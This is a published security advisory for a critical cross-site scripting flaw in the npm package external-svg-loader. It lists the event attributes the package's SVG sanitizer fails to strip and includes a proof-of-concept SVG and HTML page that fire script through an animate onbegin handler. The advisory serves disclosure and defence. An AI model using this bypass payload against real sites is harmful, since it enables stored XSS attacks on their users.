GHSA-xc2r-jf2x-gjr8

Suggest an improvement
Source
https://github.com/advisories/GHSA-xc2r-jf2x-gjr8
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/08/GHSA-xc2r-jf2x-gjr8/GHSA-xc2r-jf2x-gjr8.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-xc2r-jf2x-gjr8
Aliases
Related
Published
2023-08-14T21:32:27Z
Modified
2023-11-08T04:13:16.232467Z
Severity
  • 9.8 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
Summary
external-svg-loader Cross-site Scripting vulnerability
Details

Summary

According to the docs, svg-loader will strip all JS code before injecting the SVG file for security reasons but the input sanitization logic is not sufficient and can be trivially bypassed. This allows an attacker to craft a malicious SVG which can result in XSS.

Details

When trying to sanitize the svg the lib removes event attributes such as onmouseover, onclick but the list of events is not exhaustive. Here's a list of events not removed by svg-loader. onafterscriptexecute, onbeforecopy, onbeforecut, onbeforescriptexecute, onbeforetoggle, onbegin, onbounce, onend, onfinish, onfocusin, onfocusout, onmousewheel, onpointerrawupdate, onrepeat, onsearch, onshow, onstart, ontoggle(popover), ontouchend, ontouchmove, ontouchstart As you can see in the POC we can use onbegin in animate tag to execute JS code without needing to add data-js="enabled".

PoC

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <animate onbegin=alert(1) attributeName=x dur=1s>
</svg>

<html>
    <head>
        <script src="./dist/svg-loader.js" type="text/javascript"></script>
    </head>
    <body>
        <svg data-src="data:image/svg+xml;base64,PHN2ZyB2ZXJzaW9uPSIxLjEiIGJhc2VQcm9maWxlPSJmdWxsIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPgogIDxwb2x5Z29uIGlkPSJ0cmlhbmdsZSIgcG9pbnRzPSIwLDAgMCw1MCA1MCwwIiBmaWxsPSIjMDA5OTAwIiBzdHJva2U9IiMwMDQ0MDAiLz4KICA8YW5pbWF0ZSBvbmJlZ2luPWFsZXJ0KDEpIGF0dHJpYnV0ZU5hbWU9eCBkdXI9MXM+Cjwvc3ZnPgo="></svg>
    </body>
</html>

Impact

Any website which uses external-svg-loader and allows its users to provide svg src, upload svg files would be susceptible to stored XSS attack.

Database specific
{
    "nvd_published_at": "2023-08-14T21:15:13Z",
    "github_reviewed_at": "2023-08-14T21:32:27Z",
    "github_reviewed": true,
    "severity": "CRITICAL",
    "cwe_ids": [
        "CWE-79"
    ]
}
References

Affected packages

npm / external-svg-loader

Package

Name
external-svg-loader
View open source insights on deps.dev
Purl
pkg:npm/external-svg-loader

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
1.6.9